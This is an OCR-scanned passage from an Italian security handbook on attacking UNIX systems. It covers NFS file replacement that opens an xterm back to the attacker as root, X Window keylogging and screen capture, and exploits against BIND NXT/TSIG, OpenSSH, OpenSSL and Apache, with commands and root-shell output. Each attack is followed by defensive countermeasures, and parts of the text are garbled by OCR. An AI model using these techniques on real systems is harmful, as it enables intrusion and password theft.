e GID, per tentare l’accesso ai file binari: 


nfs> mount /usr 

Using a privileged port (1022) 
Mount '/usr', TCP, transfer size 8192 bytes. 
nfs> uid 2 

nfs> gid 2 

nfs> status 

User id soa 

Group id bi - 

Remote host : 'quake' 

Mount path i: ‘/usr' 

Transfer size: 8192 


A questo punto abbiamo le autorizzazioni di bin sul sistema remoto. Nel nostro 
esempio, i file system non sono stati esportati specificando speciali opzioni che po- 
trebbero limitare la possibilità dell'utente bin di creare o modificare file. A questo 
punto è sufficiente avviare una sessione xterm, oppure creare un canale di ritorno 
al nostro sistema per ottenere l’accesso all'obiettivo. Creiamo lo script seguente sul 
nostro sistema, e assegnamogli il nome in . ftpd: 


#!/bin/sh 
fusr/openwin/bin/xterm -display 10.10.10.10:0.0 & 


Sul sistema target, invece, eseguiamo il comando cd, per spostarci in /sbin, e sosti- 
tuiamo la versione di in, ftpd con quella che abbiamo appena creato: 


nfs> cd /sbin 
nfs> put in.ftpd 


Per finire, permettiamo al server attaccato di connettersi al server X del nostro siste- 
ma con il comando xhost, ed eseguiamo il seguente comando dal nostro sistema: 


[tsunami]# xhost +quake 

quake being added to access control list 
[tsunami]# ftp quake 

Connected to quake. 
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Come risultato, sul nostro sistema viene visualizzata una shell xterm autorizzata 
all’utente root. Dal momento che lo script in. ftpd viene avviato da inetd con i pri- 
vilegi dell'utente root, l'esecuzione dello script ha l’effetto di garantire un accesso 
istantaneo come utente root. Notate che siamo stati in grado di sovrascrivere il file 
in. ftpd perché le sue autorizzazioni erano state impostate in maniera non corretta: 
il file era di proprietà dell'utente bin anziché dell’utente root, inoltre il proprietario 
aveva anche i diritti di scrittura: 


# id 
uid=0(root) gid=0(root) 
# 


Contromisure agli attacchi a NFS 


Se NFS non è necessario, dev'essere disattivato insieme a tutti i servizi correlati (per 
esempio mountd, statd e lockd). Attivate i controlli di accesso su server e client per 
consentire l’accesso solamente agli utenti autorizzati. Generalmente, /etc/exports 
oppure /etc/dfs/dfstab o altri file simili controllano la modalità di esportazione dei 
file system, e consentono l'impostazione di tutte le opzioni di sicurezza aggiuntive: al- 
cune opzioni permettono l’accesso solamente a specifici host o a gruppi di computer, 
altre attivano le impostazioni in sola lettura o consentono di impedire la gestione dei 
bit SUID. Ciascuna implementazione di NFS è leggermente differente dalle altre, per 
cui è necessario consultare la documentazione fornita o le specifiche pagine man. 
Inoltre, evitate sempre di includere l'indirizzo IP locale del server o /ocalhost 
nell'elenco di sistemi cui è consentito il mount dei file system. Alcune versioni più 
vecchie di portmapper consentono di utilizzare il server stesso come proxy per tenta- 
re il mount come se fosse locale. Se al sistema viene concessa la possibilità di esegui- 
re il mount dei file system esportati, l'hacker potrebbe inviare pacchetti NFS al port- 
mapper del sistema remoto, che a sua volta li dirotta a /oca/bost. In questo modo la ri- 
chiesta di mount appare come generata dal server locale stesso, che essendo abilitato 
procederebbe senza indugio. Per finire, ancora una volta vi consigliamo di mantenere 
sempre il sistema aggiornato con le ultime patch disponibili. 


® Carenze di sicurezza di X 


Diffusione: 8 
Semplicità: 9 
Impatto: o) 
Fattore di rischio: È 


Il sistema X Window consente di accedere a una miriade di funzioni che visualizzano 
più programmi concorrenti sullo stesso display grafico. Il maggiore problema di X è 
che il suo approccio alla sicurezza è del tipo tutto o niente. Una volta che un client è 
autorizzato all'accesso a X, può succedere di tutto: può catturare la pressione dei tasti 
della console, chiudere altre finestre, catturarle per visualizzarle altrove e addirittura 
rimappare la tastiera per consentire l'esecuzione di programmi indipendentemente da 
quale tasto venga effettivamente premuto. La maggior parte dei problemi è generata 
da una debole politica di sicurezza, o dalla semplice pigrizia da parte degli ammini- 
stratori di sistema. La più semplice e popolare forma di controllo di accesso a X è l'au- 
tenticazione xhost, che consente di verificare l'accesso in base all'indirizzo IP del 
chiamante e rappresenta la forma meno evoluta di controllo di accesso a X. Per co- 
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modità molti amministratori di sistema utilizzano il comando xhost +, che consente 
l’accesso non autenticato al server X da parte di qualunque utente locale o remoto 
(“+” è il carattere jolly che indica qualunque indirizzo IP). Molti server X basati su PC 
si servono in modalità predefinita del comando xhost +, senza preoccuparsi degli 
utenti che si connetteranno. Qualunque hacker potrebbe utilizzare questa incontesta- 
bile debolezza per compromettere la sicurezza del sistema oggetto dell’attacco. 

Uno dei migliori programmi che consente di individuare un server X in cui è abilita- 
to xhost + è xscan, che esegue una scansione dell'intera sottorete per cercare qual- 
che server X e registrare l’attività della tastiera in un file di log; 


[tsunami]$ xscan quake 

Scanning hostname quake ... 

Connecting to quake (192.168.1.10) on port 6000... 

Connected. 

Host quake is running X. 

Starting keyboard logging of host quake:0.0 to file KEYLOGquake:0.0.., 


Da questo momento, qualunque tasto premuto alla console viene catturato e scritto 
nel file KEYLOG. quake: 


[tsunami]$ tail -f KEYLOG.quake:0.0 
su - 
[Shift_L]Iamowned[Shift_R]! 


Operando sul file di log con il veloce comando tail, è possibile rivelare l’attività 
della tastiera della console in tempo reale. Nel nostro esempio l’utente ha utilizzato 
il comando su e di seguito ha specificato la password “Iamowned!”. xscan è in gra- 
do di registrare anche la pressione dei tasti SHIFT. 

Per un hacker è anche facile ottenere la visualizzazione sul proprio sistema di una 
specifica finestra in esecuzione sul server. Innanzitutto è necessario ottenere l'ID 
esadecimale della finestra con il comando xlwins: 


[tsunami]# xlswins -display quake:0.0 |grep -i netscape 
0x1000001 (Netscape) 
0x1000246 (Netscape) 
0x1900561 (Netscape: OpenBSD) 


xlswins è anche in grado di fornire molte altre informazioni; per questo nell’esem- 
pio abbiamo utilizzato grep, al fine di verificare che Netscape fosse attivo. Fortuna- 
tamente lo è. Potete anche scorrere i risultati di xl1swins per cercare finestre più in- 
teressanti. Per visualizzare la finestra di Netscape sul vostro sistema, potete utilizza- 
re il programma XWatchWin (come mostrato nella Figura 7.3): 


[tsunami]#xwatchwin quake -w 0x1000561 


Fornendo l'ID, potete visualizzare qualunque finestra gestita dal server X e osserva- 
re di nascosto le attività svolte. 

Anche se sul server attaccato è attivo xhost -, l'hacker può essere in grado di inter- 
cettare la schermata di sessione della console utilizzando xwd, sempre che sia a di- 
sposizione una shell di sistema e che sia utilizzata l’autenticazione standard di 
xhost sul server attaccato: 


[quake]$xwd -root -display localhost:0.0 > dump.xwd 
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OpenBSD 


The OpenBSD project produces a FREE, multi-platform 4.4BSD-based UNIX-like operating system. Our 
efforts piace emphasis on portability, standardization, correctness, security, and cryptography. OpenBSD 
supports binary emulation of most programs from SVR4 (Solaris), FreeBSD, Linux, BSDI, SunOS, and HPUX. 


The current release of OpenBSD is 2,5 which started shipping May 19, 1999. The CDs (and Shirts) can be 
ordered... OpenBSD is freely available from our FTP sites, and also available in an inexpensive 2-CD set. The 
costs of producing the CD sets have been underwritten by a grant from the USENIX Association. 


CAI i:release to become available on CD, project funding is still a big issue since OpenBSD has no real 
| rie _xwm_[backer-- the development team members are volunteers. Every sold CD or financial donation 
| Gi asier for us to make new releases. 


2||I pet Goals, Y2K Statement Donations. 
d platforms, Daily Changelog. 


Figura 7.3 


Con XWachWin è possibile visualizzare qualunque applicazione X presente sul desktop 
da una postazione remota. 


Per visualizzare la schermata catturata, copiate il file sul vostro sistema con xwud: 
[tsunami]#xwud -in dump.xwd 


Come se non avessimo elencato sufficienti vulnerabilità, per un hacker è anche pos- 
sibile inviare eventi KeySym a una finestra, ossia simulare la pressione di tasti. In 
questo modo, possono essere inviati tasti a una finestra xterm del sistema target 
come se venissero digitati localmente dalla console. 


DD) Contromisure per i punti deboli di X 


Resistete a ogni costo alla tentazione di utilizzare il comando xhost +. Non siate pi- 
gri! Se siete in dubbio, utilizzate il comando xhost -, che non interrompe alcuna 
connessione esistente, ma proibisce l’attivazione di connessioni future. Se dovete 
concedere l’accesso remoto al vostro server X, indicate ogni server autorizzato tra- 
mite il suo indirizzo IP. Ricordate che ciascun utente sul server può collegarsi al vo- 
stro server X e curiosare in giro. Altre misure di sicurezza comprendono l’utilizzo di 
meccanismi di autenticazione più avanzati, come MIT-MAGIC-COOKIE-1, XDM- 
AUTHORIZATION-1, e MIT-KERBEROS-5. Questi servizi forniscono a un server X 
livelli di sicurezza aggiuntivi. Se utilizzate xterm, o un terminale X simile, abilitate 
l'opzione Secure keyboard (sicurezza tastiera), in modo che nessun altro processo 
possa essere in grado di intercettare gli eventi di utilizzo della tastiera. Prendete an- 
che in considerazione la possibilità di bloccare le porte 6000-6063 a livello di 
firewall, per inibire la connessione alle porte del server X. Per finire, considerate la 
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possibilità di utilizzare la funzionalità di incapsulamento di ssh, per migliorare la si- 
curezza durante le sessioni X: assicuratevi però che nel file sshd_config o 
sshd2_config, il parametro ForwardX11 sia impostato su “Yes”. 


® DNS (Domain Name System) 


Diffusione: 9 
Semplicità: F4 
Impatto: 10 
Fattore di rischio: 9 


DNS è uno dei servizi più comuni utilizzati da Internet e dalla maggior parte delle 
intranet aziendali. Come potete immaginare, la capillarità del servizio DNS lo rende 
particolarmente vulnerabile agli attacchi remoti: molti hacker ricercano periodica- 
mente la presenza di eventuali punti deboli nell’implementazione dell’applicazione 
DNS della distribuzione UNIX più diffusa, il pacchetto BIND (Berkeley Internet 
Name Domain). Inoltre, DNS è uno dei pochi servizi che è quasi sempre richiesto e 
utilizzato sulla rete periferica di accesso a Internet di un’organizzazione. Di conse- 
guenza un difetto nell’architettura di BIND determina quasi sicuramente un attacco 
remoto (la maggior parte delle volte con i privilegi dell’utente root). Per fare un 
esempio pratico, un sondaggio sulla sicurezza eseguito nel 1999 ha rilevato che più 
del 50% di tutti i server DNS connessi a Internet sono esposti a un attacco. Il rischio 
è reale. Attenti! 

Anche se in passato ci sono stati molti problemi di sicurezza e di disponibilità asso- 
ciati a BIND (si veda a tale proposito http://ww.cert.org/advisories/CA-98 
.95.bind_problems.html), concentreremo in particolare la nostra attenzione su 
uno degli ultimi e più devastanti attacchi a tutt'oggi conosciuti. Nel novembre 1999 
il CERT pubblicò un documento in cui venivano descritti seri difetti di sicurezza in- 
dividuati in BIND (http://ww.cert.org/advisories/CA-1999-14.html). Dei sei 
difetti rilevati, il più serio era la possibilità di un buffer overflow remoto nella moda- 
lità di validazione dei record NXT. Per ulteriori informazioni sui record NXT, si veda 
http://ww.faqs.org/rfcs/rfc2065.html. Questo buffer overflow consente 
l'esecuzione remota di un qualsiasi comando come utente root sul server oggetto 
dell’attacco. Vediamo come funziona questo attacco. 

La maggior parte degli hacker farà ricorso a strumenti automatici per cercare di 
identificare un server vulnerabile che utilizza named. Per stabilire se il meccanismo 
di sicurezza del server è esposto a questo potenziale punto debole, eseguite la se- 
guente tecnica di enumerazione: 


[tsunami]# dig @10.1.1.100 version.bind chaos txt 

j <<>> DiG 8.1 <<>> @10.1.1.100 version.bind chaos txt 

i (1 server found) 

jj res options: init recurs defnam dnsrch 

ji got answer: 

ii ->>HEADER<<- opcode: QUERY, status: NOERROR, id: 10 

i; flags: gr aa rd ra; QUERY: 1, ANSWER: 1, AUTHORITY: @, ADDITIONAL: @ 
i; QUERY SECTION: 


di version.bind, type = TXT, class = CHAOS 
i; ANSWER SECTION: 
VERSION.BIND. 0S CHAOS TXT "822 
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Questo comando esegue l’interrogazione di named e restituisce la versione associa- 
ta. Ancora una volta viene evidenziata l’importanza cha assume il rilevamento del 
profilo del sistema. Nel nostro esempio abbiamo scoperto che il server DNS obietti- 
vo utilizza la versione 8.2.2 di named, vulnerabile a un attacco NXT. Altre versioni 
vulnerabili di named sono la 8.2 e la 8.2.1. 

Affinché l'attacco vada a buon fine, l’hacker deve avere il controllo di un server DNS 
associato a un dominio valido. È assolutamente necessario impostare un sottodomi- 
nio associato con il dominio sul server DNS. Nel nostro caso, faremo l'ipotesi che la 
rete dell’hacker sia attackers.org, che il sottodominio sia denominato “hash” e che il 
server DNS venga eseguito su una sistema chiamato “quake”. In questo caso, gli hac- 
ker aggiungeranno al file /var/named/attackers.org.zone di quake la voce riporta- 
ta di seguito ed eseguiranno il riavvio di named attraverso l'interfaccia di controllo ndc: 


Subdomain IN NS hash.attackers.org. 


Ricordiamo ancora che quake è un server DNS controllato dagli hacker. Dopo aver 
compilato l'attacco associato scritto dal gruppo ADM (http://packetstormsecu- 
rity.0rg/9911-exploits/adm-nxt.c), questo deve essere eseguito da un sistema 
diverso (tsunami), che disponga dell’architettura corretta. Poiché named può essere 
eseguito su molte varianti UNIX, riportiamo di seguito i tipi di architettura che sup- 
portano questo attacco: 


[tsunami]# adm-nxt 
Usage: adm-nxt architecture [command] 
Available architectures: 


1: Linux Redhat 6.x - named 8.2/8.2.1 (from rpm) 

2: Linux SolarDiz's non-exec stack patch - named 8.2/8.2.1 
3: Solaris 7 (@xff) - named 8.2.1 

4: Solaris 2.6 - named 8.2.1 

5: FreeBSD 3.2-RELEASE - named 8.2 

6: OpenBSD 2.5 - named 8.2 

7: NetBSD 1.4.1 - named 8.2.1 


Il footprinting eseguito in precedenza con nmap ci ha permesso di stabilire che sul 
sistema target è installato RedHat 6.x; pertanto selezioniamo l'opzione 1: 


[tsunami]#adm-nxt 1 


Una volta eseguito, l'attacco si connette alla porta UDP 53 di tsunami e resta in atte- 
sa di una connessione dal server dei nomi vulnerabile. Affinché l’attacco possa col- 
legarsi alla porta 53, sul sistema non deve essere eseguito un server DNS reale. Ri- 
cordate che l’intero attacco è basato sul fatto che il server dei nomi si possa collega- 
re al nostro server DNS fittizio, che è in realtà l'hacker stesso in ascolto sulla porta 
UDP 53, o lo interroghi. Ma come si fa a portare a termine questa operazione? Sem- 
plice. L'hacker chiede al server DNS l’obiettivo di ricercare alcune informazioni di 
base tramite il comando nslookup: 


[quake]# nslookup 
Default Server: localhost.attackers.org 
Address: 127.0.0.1 


> server 10.1.1.100 
Default Server: dns.victim.net 
Address: 19.1.1.100 
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> hash.attackers.org 
Server: dns.victim.net 
Address: 10.1.1.100 


Come potete vedere, l’hacker esegue nslookup in modalità interattiva su un sistema 
diverso sotto il suo controllo. Quindi l’hacker si sposta dal server DNS che utilizze- 
rebbe normalmente al server 10.1.1.100 della vittima. Per finire, chiede al server 
DNS obiettivo l'indirizzo di “hash.attackers.org”: questo determina un’interrogazio- 
ne del server DNS fittizio in ascolto sulla porta UDP 53. Una volta che il server dei 
nomi si è collegato a tsunami, l'attacco buffer overflow viene inviato a dns.vic- 
tim.net, consentendo l’accesso diretto all'utente root: 


[tsunami]# t666 1 

Received request from 10.1.1.100:53 for hash.attackers.org type=t 
id 

uid=0(root) gid=@0(root) groups=@(root) 


Notate come l’hacker non disponga di una shell vera e propria, ma sia, tuttavia, in 
grado di inviare comandi come utente root. 


C) DNSTSIG 

Diffusione: 8 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9 


Nella migliore tradizione della vulnerabilità di BIND, agli inizi del 2001 sono state 
scoperte condizioni di buffer overflow: esse sono descritte nel CERT di Camegie Mel- 
lon, reperibile all'indirizzo http://www.cert.org/advisories/CA-2001-02.html. 
Queste condizioni interessano le versioni di BIND elencate di seguito. 


Versioni di BIND 8 8.2, 8.2.1, da 8.2.2 fino a 8.2.2-P7 
Da 8.2.3-T1A fino a 8.2.3-T9B 
Versioni di BIND 4 Buffer overflow: da 4.9.5 a 4,9.7 


Formato stringa: da 4.9.3 a 4.9.5-P1 


Una delle peggiori situazioni di buffer overflow è quella relativa alle funzionalità di 
elaborazione TSIG (7ransaction Signature, RFC2845) di BIND 8: l'attacco di questa 
vulnerabilità può essere realizzato in modalità remota e con conseguenze devastan- 
ti, potendosi combinare con le condizioni di “infoleak” segnalate nelle note CERT. Il 
tipo di vulnerabilità “infoleak” consente all’hacker di utilizzare named per recupera- 
re lo stack necessario per eseguire l'attacco di buffer overflow TSIG: dal momento 
che il buffer overflow in questione ha luogo nella fase iniziale di una richiesta DNS, 
sono da considerarsi vulnerabili sia i server DNS ricorsivi sia quelli non ricorsivi. 
Esaminiamo l'attacco in azione contro un server DNS Linux vulnerabile: 


[wave]# nmap 10.10.10.1 -p 53 -0 

Starting nmap V. 2.30BETA17 by fyodor@insecure.org 
Interesting ports on (10.10.10.1); 

Port State Servie 

53/tcp open domain 
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TCP Sequence Prediction: Class=random positive increments 
Difficulty=3340901 (Good luck!) 
Remote operating system guess: Linux 2,1.122 - 2.2,14 


Si ricorre al comando dig per determinare la versione del BIND: 


[wave]# dig @10.10.10.1 version.bind txt chaos 
VERSION,.BIND. OS CHAOS TXT si RCA 


Il BIND 8.2.1 è ora soggetto alla vulnerabilità TSIG: 


[wave]# ./bind8x 19.19.10.1 

[*] named 8.2.x (< 8.2.3-REL) remote root exploit by lucysoft, Ix 
[*] fxed by ian@cypherpunks.ca and jwilkins@bitland.net 

[*] attacking 10.10.10.1 (10.10.10.1) 

[d] HEADER is 12 long 

[d] infoleak_qry was 476 long 

[*] iquery resp len = 719 

[d] argevdispi = 080d7cd0, argevdisp2 = 4010d6c8 

[*] retrieved stack offset = bffffae8 

[d] evil query(buff, bffffae8) 

[d] shellcode is 134 long 

[d] old = 232 

[*] injecting shellcode at 1 

[*] connecting.. 

[*] wait for your shell.. 

Linux toast 2.2,12-20 #1 Mon Sep 27 10:40:35 EDT 1999 1686 unknown 
uid=0(root) gid=0(root) 
groups=0(root),1(bin),2(daemon},3(sys),4(adm),6(disk),1@0(wheel) 


Come per l'attacco DNS NXT illustrato in precedenza, l’hacker non dispone di una vera 
e propria shell, ma può eseguire dei comandi con named, con privilegi di root. 


© Contromisure per i punti deboli del DNS 


Per prima cosa, disabilitate e rimuovete BIND su qualsiasi sistema che non viene 
utilizzato come server DNS. Su molte installazioni standard di UNIX (particolarmen- 
te Linux), named viene eseguito durante la sequenza di avvio senza mai essere uti- 
lizzato dal sistema. In secondo luogo, assicuratevi di utilizzare la versione di BIND 
corrente e aggiornata per i difetti di sicurezza collegati (consultate il sito http: // 
ww.isc.org/products/BIND/bind-security.html): a tutte le ultime versioni di 
BIND sono state applicate le patch relative alla suddetta vulnerabilità. Terzo, ese- 
guite named come utente senza privilegi: in verità, esso dovrebbe essere eseguito 
come utente root solo per collegarsi alla porta 53, per poi rilasciare i diritti utilizzan- 
do l'opzione -u (named -u dns -g dns). Infine, named dovrebbe essere eseguito da 
un ambiente chrooted(), utilizzando l'opzione - t per impedire che un hacker 
possa accedere all'intero file system anche se ha ottenuto l’accesso al sistema 
(named -u dns -g dns -t /home/dns). Anche se queste misure di sicurezza fanno al 
caso vostro, ricordate che non sono la panacea di tutti i mali, pertanto è assoluta- 
mente necessario essere cauti al limite della paranoia quando si tratta delle sicurez- 
za del server DNS. 

Se non ne potete più delle molte carenze di sicurezza associate a BIND, prendete in 
considerazione l'utilizzo di djbdns (http://cr.yp.to/djbdns.html), un prodotto 
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particolarmente sicuro scritto da Dan Bernstein, progettato per costituire un’alterna- 
tiva affidabile, sicura e veloce a BIND. 


® Carenze di sicurezza di SSH 


Diffusione: 6 
Semplicità: 4 
Impatto: 10 
Fattore di rischio: 7 


SSH è uno dei servizi preferiti per la disponibilità di accesso remoto sicuro: dispone 
di numerose opzioni e garantisce la tranquillità e la sicurezza di milioni di utenti, In 
effetti, gran parte dei sistemi più sicuri si basa su SSH per difendersi dagli utenti non 
autenticati e per proteggere i dati e le credenziali di login dalle intercettazioni. Mal- 
grado tutta questa sicurezza, SSH è stato soggetto a diverse condizioni di vulnerabi- 
lità. 

Una delle più dannose è relativa a una falla nella compensazione CRC-32 del codice 
di rilevamento di attacchi di $SH1, aggiunto diversi anni fa per risolvere un grave 
problema di vulnerabilità connesso alla crittografia nel protocollo SSH1. Così come 
si verifica a volte per quelle progettate per correggere problemi di sicurezza, questa 
patch presentava una nuova falla nel codice di rilevamento degli attacchi, che 
avrebbe potuto consentire l'esecuzione di codice arbitrario sui client e server SSH 
che l'avevano installata. La rilevazione ha luogo utilizzando una tabella hash che 
viene allocata dinamicamente in base alla dimensione del pacchetto ricevuto. Il 
problema si riferisce alla dichiarazione impropria di una variabile utilizzata nel codi- 
ce di rilevamento: un hacker potrebbe introdurre pacchetti SSH di grandi dimensio- 
ni (di lunghezza superiore a 2416) affinché il codice effettui una chiamata a xmal - 
loc() con argomento 0, cosa che restituirebbe un puntatore nello spazio di indiriz- 
zamento del programma. 

Se gli hacker sono capaci di scrivere locazioni di memoria arbitrarie nello spazio di 
indirizzamento di SSH (server o client), possono far eseguire porzioni di codice dal 
sistema ora vulnerabile, a loro discrezione. 

Questa falla interessa non solo i server SSH, ma anche i client. Risultano vulnerabili 
tutte le versioni di SSH che supportano il protocollo 1(1.5), che utilizza la compen- 
sazione CRC del codice di rilevamento attacchi. 


e Le versioni di OpenSSH precedenti alla 2.3.0 sono vulnerabili. 
e Le versioni di SSH-1.2.24 fino alla SSH-1.2.31 compresa sono vulnerabili. 


® Vulnerabilità della procedura 
di Challenge-Response in OpenSSH 


Nelle versioni 2.9,9 e 3.3 di OpenSSH sono state riscontrate diverse vulnerabilità, 
tutte ugualmente recenti e dannose per la sicurezza dell’intero sistema. La prima de- 
gna di rilievo è il verificarsi di una situazione di overflow dei numeri interi a livello 
della ricezione delle risposte, durante una procedura di autenticazione di tipo chal- 
lenge-response. Per eseguire l’attacco a questa vulnerabilità si deve tenere conto di 
diversi fattori. Se è impostata l'opzione di configurazione per l'utilizzo della modali- 
tà challenge-response e il sistema utilizza un metodo di autenticazione di tipo 


_ a 
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BSD_AUTH o SKEY, un buon hacker sarà in grado di eseguire un codice con i pri- 
vilegi di root sul sistema attaccato, Ecco come: 


[wavej# ./ssh 10.0,1.1 

[*] remote host supports ssh2 

Warning: Permanently added '10.0.48.15' (RSA) to the list of known hosts. 
[*] server_user: bind:skey 

[*] keyboard-interactive method available 

[*] chunk_size: 4096 tcode rep: 0 scode rep 60 

[*] mode: exploitation 

*GOBBLE* 

OpenBSD rd-openbsd31 3.1 GENERIC#0 1386 

uid=0(root) gid=0(wheel) groups=0(wheel) 


Dal sistema dal quale viene sferrato l’attacco (wave) è stato possibile realizzare l'at- 
tacco del sistema vulnerabile avente indirizzo IP 10.1.1.1, che utilizzava il sistema di 
autenticazione SKEY e possedeva una versione di sshd non aggiornata. Come pote- 
te vedere, gli effetti sono devastanti, perché abbiamo ottenuto i privilegi di root sul- 
la piattaforma OpenBSD 3.1. 

La seconda vulnerabilità consiste nel provocare una situazione di buffer overflow 
durante la procedura challenge-response. A prescindere dal fatto che sia impostata 
l’opzione di configurazione per l'utilizzo della modalità challenge-response, un si- 
stema che utilizza PAM (P/uggable Autbentication Modules), anche se con autenti- 
cazione interattiva da tastiera (PAMAutbenticationViaKbdInt) si rivela vulnerabile 
agli accessi da remoto con privilegi di root. 


Contromisure alle vulnerabilità di SSH 


Verificate se state utilizzando versioni di SSH client e server aggiornate con le ultime 
patch: per un elenco completo delle molte versioni di SSH vulnerabili, consultate il 
sito http://online.securityfocus.com/bid/5093. Per una rapida soluzione, si 
consiglia l'aggiornamento alla versione Open$SH 3.4.0 o successiva, che sono di- 
sponibili all'indirizzo http://ww.openssh.com. Oltre a questo, non trascurate di 
utilizzare le caratteristiche di separazione dei privilegi presenti a partire dalla versio- 
ne 3.2 di OpenSSH, che permettono di eseguire il daemon sshd all’interno di un 
ambiente chroot o di un ambiente privo di autorizzazioni: in questo modo, anche 
se dovesse forzare sshd (per esempio, sfruttando la vulnerabilità di buffer over- 
flow), un intruso otterrebbe privilegi molto limitati. La separazione dei privilegi 
deve essere abilitata nel file /etc/ssh/sshd_config, impostando a YES il parame- 
tro UsePrivilegeSeparation. 


® Overflow di OpenSSL 


Diffusione: 8 
Semplicità: 8 
Impatto: 10 
Fattore di rischio: 9 


Worm, worm e ancora worm: quando ci libereremo di questi attacchi così antipati- 
ci? Non ci sembrerà vero di aver ripulito il mondo dei computer dai worm, o dalla 
propagazione di codice dannoso attraverso sistemi vulnerabili. Proprio il worm 
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Slapper ha approfittato delle vulnerabilità dei sistemi OpenSSL, prendendo di mira 
le versioni dalla 0.9.6 alla 0.6.7 beta 2. OpenSSL è un’implementazione open source 
del servizio SSL (Secure Socket Layer), ed è presente in molte versioni di UNIX (spe- 
cialmente in quelle gratuite). Nelle versioni di OpenSSL vulnerabili è stata riscontra- 
ta una condizione di buffer overflow nella gestione del codice utente, durante la 
procedura di negoziazione effettuata dal protocollo SSLv2, che può portare un hac- 
ker a ottenere i privilegi necessari per eseguire qualsiasi codice sul server Web at- 
taccato. Questo è esattamente quello che fa il worm Slapper. Osserviamo nel detta- 
glio un attacco a un sistema con OpenSSL: 


[wave]$ ./ultrassl 10.0.1.1 

ultrassl - an openssl <= 0.9.6d apache exploit (brute force version) 
using 101 byte shellcode 

performing information leak: 


06 b7 98 7e 50 9i ba 65 83f a8 5d 8d fe a6 13 60 | -P..0?.] 

8d 00 00 20 00 00 00 009 02 00 00 00 00 02 00 00, ................. 
00 20 00 00 00 36 64 35 39 32 34 30 32 66 64 31 | . ...6d592402fd1 
33 34 32 36 37 33 31 33 34 33 66 65 33 32 37 30 | 3426731343fe3270 
64 35 33 62 34 00 00 00 00 10 Ge 15 08 00 00 00 | d53b4..... Nissan 
20 00 00 00 00 dI 00 00 00 2c dI 00 00 05 e3 87 |.......... giecsrsiataca 
3d 00 00 00 00 &c 70 47 40 00 00 00 00 ed 6d 15 0 pG@..... m 


\08 

cipher = 0x4047708c 

ciphers = 0x08156de0 

get_server_hello(): unexpected response 
get_server_hello(): unexpected response 

brute force: 0x40478e1c 

populating shellcode.. 

performing exploitation.. 

Linux localhost.localdomain 2.4.7-1@ 1686 unknown 
uid=48(apache) gid=48(apache) groups=48(apache) 


Come si può vedere, siamo riusciti a forzare il server Web 10.1.1.1 e a ottenere l’ac- 
cesso a esso senza privilegi: notate che non abbiamo ottenuto i privilegi di root, 
perché Apache su molti sistemi viene visto dal sistema come un utente (apache, ap- 
punto) senza privilegi. Sebbene all’hacker non siano stati attribuiti immediatamente 
i privilegi di root, è solo questione di tempo: vedremo come fare nel paragrafo “Ac- 
cesso locale”, nel prosieguo di questo capitolo. 


Contromisure per OpenSSL 


La soluzione migliore consiste nel mantenere sempre aggiornato OpenSSL alle ulti- 
me patch e alle versioni successive alla 0.9.6e. Tenete presente che le piattaforme 
che utilizzano OpenSSL sono molte, quindi possono essere oggetto di attacchi: ne 
potete trovare un elenco completo sul sito Web http://online.securityfo- 
cus.com/bid/5363/solution/. Come ulteriore contromisura, è consigliabile disabi- 
litare il protocollo SSLv2, qualora non sia strettamente necessario, rendendo non 
commentata la direttiva SSLCipherSuite e aggiungendole in fondo la stringa 
:1SSLv2:+SSLv2: tale modifica sarà resa valida dopo il riavvio del server Web. 
Un'ottima risorsa per mantenere i vostri server al massimo delle loro possibilità è il 
sito WWW Security FAQ, alla pagina Web http://www.w3.org/Security/fag/www- 
security-fag.html. 
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® Attacchi ad Apache 


Diffusione: s 
Semplicità: 8 
Impatto; 10 
Fattore di rischio: 9 


Ora che abbiamo visto come proteggere OpenSSL, rivolgiamo la nostra attenzione 
ad Apache, che al momento è il server Web più utilizzato nel mondo: secondo le 
stime di Netcraft.com, Apache gestisce oltre il 60% dei server presenti in Internet. 
Data la sua popolarità, non sorprende che proprio Apache sia il bersaglio preferito 
di molti pirati informatici. Uno dei maggiori punti deboli di questo server Web è la 
modalità di gestione delle richieste non valide codificate a blocchi. Il trasferimento 
di dati codificati a blocchi permette al mittente di inviare il contenuto (body) di un 
messaggio HTML suddividendolo in più parti, ciascuna contenente un campo che 
ne indica la dimensione. Questa vulnerabilità riguarda le versioni di Apache dalla 
1.3 alla 1.3.24, e quelle dalla 2 alla 2.0.39. Un hacker può agire inviando al server 
Apache una richiesta non corretta tale da realizzare l'attacco, producendo una con- 
dizione di buffer overflow: 


[wave]$ ./apache-nosejob -h 10.0.1.1 -00 
[*#] Resolving target host.. 10.0.1.1 

[*] Connecting.. connected! 

] Exploit output is 32322 bytes 

] Currently using retaddr 0x80000 

] Currently using retaddr 0x88c00 

] Currently using retaddr 0x91800 

] Currently using retaddr 0x9a200 

] Currently using retaddr 0xb2e00 

d 


Da questo output possiamo vedere che la versione vulnerabile di Apache è stata 
forzata con successo, facendo ottenere all’hacker l’accesso con i privilegi di “nobo- 
dy”. Siccome il daemon di Apache viene visto dal sistema come un utente privo di 
privilegi, l'hacker non ottiene immediatamente i privilegi di root: come vedremo tra 
breve, nel paragrafo “Accesso locale”, su molti sistemi riuscire in quest'impresa è 
solo una questione di tempo. 


DÌ Contromisure per Apache 


Come abbiamo già visto esaminando altre vulnerabilità di questo tipo, la soluzione 
migliore è mantenere aggiornato Apache con le patch e gli aggiornamenti alla ver- 
sione sicura più recente. La vulnerabilità appena esaminata, in particolare, è stata 
eliminata con successo a partire dalle versioni 1.3.26 e 2.0.39, che possono essere 
scaricate gratuitamente dal sito http://www. apache . org. È altresì consigliabile con- 
sultare il sito del produttore di qualsiasi altro software eventualmente correlato ad 
Apache (come, per esempio, Red Hat StrongHold), Potete trovare una lista comple- 
ta delle versioni vulnerabili di Apache alla pagina Web http://online.securi- 
tyfocus.com/bid/5033. 
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(O) Attacchi in modalità promiscua 
Diffusione: 
Semplicità: 
Impatto: 


419% n 


Fattore di rischio: 


I programmi cosiddetti di sniffing come tepdump, snort e snoop consentono agli 
amministratori di rete e di sistema di monitorare (“annusare”, come si dice in gergo) 
il traffico che transita nella loro rete, Questi programmi sono assai diffusi e fornisco- 
no informazioni importanti, utili per la rilevazione dei problemi di rete. In effetti, i 
sistemi di rilevazione delle intrusioni di rete si basano sulle tecnologie di sniffing e 
sono utilizzati per tenere sotto controllo i possibili comportamenti anomali, “annu- 
sando” il traffico di rete. Pur garantendo un servizio estremamente importante, è ne- 
cessario che questi programmi siano eseguiti con i privilegi di root. Non deve per- 
tanto sorprendere che possano essere compromessi da un hacker capace di inviare 
dei pacchetti insidiosi alla rete in cui essi risiedono. 

